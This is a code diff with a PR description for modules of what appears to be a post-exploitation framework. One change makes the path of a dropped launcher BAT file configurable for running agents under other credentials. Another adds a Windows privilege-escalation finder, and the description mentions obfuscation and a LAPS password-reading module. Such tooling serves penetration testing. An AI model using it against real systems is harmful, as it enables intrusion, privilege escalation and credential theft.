--- a/lib/modules/powershell/management/spawnas.py
+++ b/lib/modules/powershell/management/spawnas.py
@@ -57,6 +57,11 @@ class Module:
                 'Required'      :   False,
                 'Value'         :   ''
             },
+            'DropperPath' : {
+                'Description'   :   'Location on remote system to save BAT File for RunAs',
+                'Required'      :   False,
+                'Value'         :   '$env:public\debug.bat'
+            },
             'Listener' : {
                 'Description'   :   'Listener to use.',
                 'Required'      :   True,
@@ -142,7 +147,7 @@ class Module:
         launcherCode = l.generate()
 
         # PowerShell code to write the launcher.bat out
-        scriptEnd = "$tempLoc = \"$env:public\debug.bat\""
+        scriptEnd = "$tempLoc = \"%s\"" % (self.options['DropperPath']['Value'])
         scriptEnd += "\n$batCode = @\"\n" + launcherCode + "\"@\n"
         scriptEnd += "$batCode | Out-File -Encoding ASCII $tempLoc ;\n"
         scriptEnd += "\"Launcher bat written to $tempLoc `n\";\n"
@@ -155,7 +160,8 @@ class Module:
         if(domain and domain != ""):
             scriptEnd += "-Domain %s " %(domain)
 
-        scriptEnd += "-Cmd \"$env:public\debug.bat\""
+        scriptEnd += "-Cmd \"%s\"" % (self.options['DropperPath']['Value'])
+
         if obfuscate:
             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
         script += scriptEnd

--- a/lib/modules/powershell/privesc/sherlock.py
+++ b/lib/modules/powershell/privesc/sherlock.py
@@ -1,0 +1,61 @@
+from lib.common import helpers
+class Module:
+    def __init__(self, mainMenu, params=[]):
+        self.info = {
+            'Name': 'Sherlock',
+            'Author': ['@_RastaMouse'],
+            'Description': ('Find Windows local privilege escalation vulnerabilities.'),
+            'Background' : True,
+            'OutputExtension' : None,
+            
+            'NeedsAdmin' : False,
+            'OpsecSafe' : True,
+            
+            'Language' : 'powershell',
+            'MinLanguageVersion' : '2',
+            
+            'Comments': [
+                'https://github.com/rasta-mouse/Sherlock'
+            ]
+        }
+        # any options needed by the module, settable during runtime
+        self.options = {
+            # format:
+            #   value_name : {description, required, default_value}
+            'Agent' : {
+                'Description'   :   'Agent to run module on.',
+                'Required'      :   True,
+                'Value'         :   ''
+            }
+        }
+        # save off a copy of the mainMenu object to access external functionality
+        #   like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+        for param in params:
+            # parameter format is [Name, Value]
+            option, value = param
+            if option in self.options:
+                self.options[option]['Value'] = value
+    def generate(self, obfuscate=False, obfuscationCommand=""):
+        moduleName = self.info["Name"]
+        
+        # read in the common powerup.ps1 module source code
+        moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Sherlock.ps1"
+        if obfuscate:
+            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
+            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
+        try:
+            f = open(moduleSource, 'r')
+        except:
+            print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
+            return ""
+        moduleCode = f.read()
+        f.close()
+        # # get just the code needed for the specified function
+        # script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
+        script = moduleCode
+        scriptEnd = "Find-AllVulns | Out-String"
+        if obfuscate:
+            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+        script += scriptEnd
+        return script


### PR DESCRIPTION
- Fixed issue documented in issue #827.  When doing PSRemote from an non-administrator the check to identify Remote OS fails and caused an invalid CheckIn format.  On error this check now returns "Windows ?"

- PSRemoting utilized Invoke-Command without the -AsJob flag, this caused the agent executing the module to hang until the new agent dies.

- Added some obfuscation flags to PSRemoting

- Added Get-LAPSPasswords Module from https://github.com/kfosaaen/Get-LAPSPasswords